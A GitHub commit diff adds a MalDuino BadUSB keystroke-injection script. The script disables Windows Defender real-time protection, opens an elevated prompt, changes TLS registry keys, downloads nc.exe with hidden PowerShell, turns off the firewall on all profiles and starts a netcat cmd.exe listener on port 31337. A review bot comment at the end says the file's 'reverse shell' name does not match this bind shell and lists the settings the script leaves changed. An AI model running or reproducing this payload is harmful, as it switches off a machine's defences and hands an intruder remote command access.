Commit 5b7677d

Update and rename nc.txt to malduino_nc_reverse_shell.txt
1 parent 78679cf commit 5b7677d

2 files changed

+70
-82
lines changed

malduino_nc_reverse_shell.txt

Lines changed: 70 additions & 0 deletions
@@ -0,0 +1,70 @@
1+
DELAY 1000
2+
REM Open Windows Defender settings
3+
CTRL ESC
4+
DELAY 1000
5+
STRING Windows Defender Settings
6+
DELAY 100
7+
ENTER
8+
REM Navigate to realtime protection and disable it
9+
DELAY 1000
10+
ENTER
11+
DELAY 1000
12+
ENTER
13+
DELAY 1000
14+
TAB
15+
DELAY 250
16+
TAB
17+
DELAY 250
18+
TAB
19+
DELAY 250
20+
TAB
21+
ENTER
22+
DELAY 1000
23+
SPACE
24+
DELAY 1000
25+
ALT y
26+
DELAY 500
27+
ALT F4
28+
DELAY 100
29+
ALT F4
30+
DELAY 100
31+
GUI r
32+
DELAY 200
33+
STRING cmd
34+
DELAY 200
35+
CTRL SHIFT ENTER
36+
DELAY 500
37+
ALT y
38+
DELAY 500
39+
ESC
40+
STRING cd %temp%
41+
ENTER
42+
43+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -Force}
44+
DELAY 100
45+
ENTER
46+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}
47+
DELAY 100
48+
ENTER
49+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}
50+
DELAY 100
51+
ENTER
52+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Client' -Force}
53+
DELAY 100
54+
ENTER
55+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}
56+
DELAY 100
57+
ENTER
58+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')"
59+
DELAY 100
60+
ENTER
61+
DELAY 2000
62+
STRING netsh advfirewall set allprofiles state off
63+
DELAY 100
64+
ENTER
65+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "%temp%\nc.exe -Lp 31337 -vv -e cmd.exe"
66+
DELAY 100
67+
ENTER
68+
STRING exit
69+
DELAY 100
70+
ENTER
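
Review bot: The file name and commit title say "reverse shell", but diff line 65 starts nc in listen mode (`-Lp 31337 -vv -e cmd.exe`), so the name and the behaviour disagree; rename the file or state the actual behaviour in a REM header. Only diff lines 2 and 8 carry REM comments, while lines 43 to 62 make machine-wide changes (the SCHANNEL `TLS 1.3` Server/Client keys, .NET `SystemDefaultTlsVersions`, `netsh advfirewall set allprofiles state off`) with no explanation, and nothing in the script restores them or the Defender real-time protection toggled at lines 8 to 25. Add a REM line per block and a header listing every setting the host is left with (Defender real-time protection off, firewall off on all profiles, TLS 1.3 server disabled, a cmd.exe listener on port 31337 started from the elevated prompt opened at line 35), so anyone running this on a lab machine knows what has to be reverted afterwards.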

nc.txt

Lines changed: 0 additions & 82 deletions
This file was deleted.
